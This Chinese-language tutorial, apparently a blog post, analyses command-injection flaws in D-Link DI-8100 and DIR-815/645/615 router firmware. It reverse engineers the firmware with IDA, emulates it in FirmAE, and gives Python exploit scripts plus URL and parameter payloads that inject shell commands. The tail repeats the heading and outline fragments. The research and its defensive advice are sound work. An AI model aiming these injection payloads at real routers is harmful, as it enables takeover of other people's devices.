D-Link路由器命令执行漏洞分析与复现教程<\/h1>

一、漏洞概述<\/h2>
本教程详细分析D-Link DI-8100和DIR-815\/645\/615路由器的命令执行漏洞，包含漏洞原理分析、环境搭建、漏洞复现和EXP编写等内容。<\/p>

二、环境准备<\/h2>

1. 所需工具<\/h3>

GDB (调试工具)<\/li> <\/ul>

2. 工具配置<\/h3>

Burp Suite代理设置参考：Burp Suite代理和火狐浏览器的设置<\/a><\/li>

FirmAE下载与使用：FirmAE GitHub<\/a><\/li> <\/ul>

3. 固件下载<\/h3>

DI-8100固件：D-Link官网<\/a><\/li>

DIR-815固件：D-Link FTP<\/a><\/li> <\/ul>

三、DI-8100漏洞分析<\/h2>

1. 固件分析<\/h3>

使用binwalk分解固件：

binwalk -Me DI-8100_firmware.bin
<\/code><\/pre>
<\/li>
查看系统架构和保护机制<\/li>
<\/ol>
2. 漏洞定位<\/h3>

主要分析目标：jhttpd<\/code>服务<\/li>
漏洞触发点：msp_info.htm<\/code>页面中的cmd<\/code>参数<\/li>
<\/ul>
3. IDA逆向分析<\/h3>

使用IDA打开jhttpd<\/code>程序<\/li>
搜索字符串msp_info<\/code>定位到msp_info_htm<\/code>函数<\/li>
关键漏洞逻辑：

函数开头从传入值中获取flag<\/code>字符串<\/li>
当flag=cmd<\/code>时，后续的cmd<\/code>内容会被放入system<\/code>函数执行<\/li>
<\/ul>
<\/li>
<\/ol>
4. 漏洞复现步骤<\/h3>


使用FirmAE仿真固件：<\/p>
.\/run.sh DI-8100_firmware.bin
<\/code><\/pre>
选择选项2进入终端<\/p>
<\/li>

访问路由器管理界面：<\/p>
http:\/\/192.168.0.1:80
<\/code><\/pre>
默认凭证：admin\/admin<\/p>
<\/li>

构造漏洞利用URL：<\/p>
http:\/\/192.168.0.1\/msp_info.htm?flag=cmd&cmd=touch+\/a.txt
<\/code><\/pre>
验证是否在根目录创建了a.txt文件<\/p>
<\/li>
<\/ol>
5. EXP编写<\/h3>

使用Burp Suite抓取登录请求<\/li>
编写Python脚本：
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/192.168.0.1\/msp_info.htm"<\/span>
<\/span><\/span>params =<\/span> {
<\/span><\/span>    "flag"<\/span>: "cmd"<\/span>,
<\/span><\/span>    "cmd"<\/span>: "touch \/xidp.txt"<\/span>
<\/span><\/span>}
<\/span><\/span>response =<\/span> requests.<\/span>get(url, params=<\/span>params)
<\/span><\/span>print(response.<\/span>status_code)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
四、DI-8100第二个漏洞<\/h2>
1. 漏洞位置<\/h3>

upgrade_filter_asp<\/code>函数存在另一个命令执行漏洞<\/li>
<\/ul>
2. 利用方式<\/h3>

抓取登录请求包<\/li>
编写类似EXP，修改参数为：
params =<\/span> {
<\/span><\/span>    "action"<\/span>: "upgrade"<\/span>,
<\/span><\/span>    "filter"<\/span>: "| touch \/vuln.txt"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
五、DIR-815\/645\/615漏洞分析<\/h2>
1. 固件分析<\/h3>

分解固件：
binwalk -Me DIR815A1_FW103b01.bin
<\/code><\/pre>
<\/li>
关键文件：

squashfs-root\/htdocs\/web\/service.cgi<\/code> (指向cgibin<\/code>的软链接)<\/li>
<\/ul>
<\/li>
<\/ol>
2. 漏洞定位<\/h3>

主要分析目标：cgibin<\/code>文件<\/li>
漏洞调用链：servicecgi_main<\/code> -> lxmldbc_system<\/code> -> system<\/code><\/li>
<\/ul>
3. IDA逆向分析<\/h3>

使用IDA打开cgibin<\/code><\/li>
搜索字符串定位到servicecgi_main<\/code>函数<\/li>
关键漏洞逻辑：

检查请求方法(POST\/GET)<\/li>
POST请求需要CONTENT_LENGTH<\/code>环境变量<\/li>
解析查询参数<\/li>
检查Content-Type<\/code>为application\/x-www-form-urlencoded<\/code><\/li>
用户输入拼接进system命令<\/li>
<\/ul>
<\/li>
<\/ol>
4. 漏洞复现步骤<\/h3>


使用FirmAE仿真原始固件<\/p>
<\/li>

访问管理界面：<\/p>
http:\/\/192.168.0.1:80
<\/code><\/pre>
<\/li>

发现sess_ispoweruser<\/code>检查会导致失败，需要修改固件：<\/p>

使用IDA将sess_ispoweruser<\/code>函数NOP掉<\/li>
重新打包固件：
mksquashfs squashfs-root rootfs.squashfs -noappend -always-use-fragments
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

重新仿真修改后的固件<\/p>
<\/li>
<\/ol>
5. EXP编写<\/h3>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/192.168.0.1\/service.cgi"<\/span>
<\/span><\/span>headers =<\/span> {
<\/span><\/span>    "Content-Type"<\/span>: "application\/x-www-form-urlencoded"<\/span>
<\/span><\/span>}
<\/span><\/span>data =<\/span> {
<\/span><\/span>    "action"<\/span>: "anything"<\/span>,
<\/span><\/span>    "service"<\/span>: "$(touch \/tmp\/test)"<\/span>
<\/span><\/span>}
<\/span><\/span>response =<\/span> requests.<\/span>post(url, headers=<\/span>headers, data=<\/span>data)
<\/span><\/span>print(response.<\/span>text)
<\/span><\/span><\/code><\/pre>六、漏洞利用技巧<\/h2>


命令执行无回显时，可以通过创建文件验证：<\/p>
touch \/tmp\/vuln_test
<\/code><\/pre>
然后通过浏览器访问：<\/p>
http:\/\/192.168.0.1\/tmp\/vuln_test
<\/code><\/pre>
<\/li>

文件内容读取：<\/p>
echo "test content" > \/tmp\/readme
<\/code><\/pre>
然后下载文件查看内容<\/p>
<\/li>
<\/ol>
七、防护建议<\/h2>

输入验证：对所有用户输入进行严格过滤<\/li>
权限控制：限制Web服务的执行权限<\/li>
固件更新：及时更新到最新版本<\/li>
最小权限原则：服务运行使用最低必要权限<\/li>
<\/ol>
八、总结<\/h2>
本教程详细分析了D-Link多款路由器的命令执行漏洞，从固件分析、逆向工程到漏洞复现和EXP编写，提供了完整的漏洞研究流程。这些漏洞主要源于对用户输入的不当处理，导致攻击者可以执行任意系统命令，危害严重。<\/p>

D-Link路由器命令执行漏洞分析与复现教程<\/h1>

一、漏洞概述<\/h2> 本教程详细分析D-Link DI-8100和DIR-815\/645\/615路由器的命令执行漏洞，包含漏洞原理分析、环境搭建、漏洞复现和EXP编写等内容。<\/p>

二、环境准备<\/h2>

三、DI-8100漏洞分析<\/h2>

四、DI-8100第二个漏洞<\/h2>

五、DIR-815\/645\/615漏洞分析<\/h2>

一、漏洞概述<\/h2>
本教程详细分析D-Link DI-8100和DIR-815\/645\/615路由器的命令执行漏洞，包含漏洞原理分析、环境搭建、漏洞复现和EXP编写等内容。<\/p>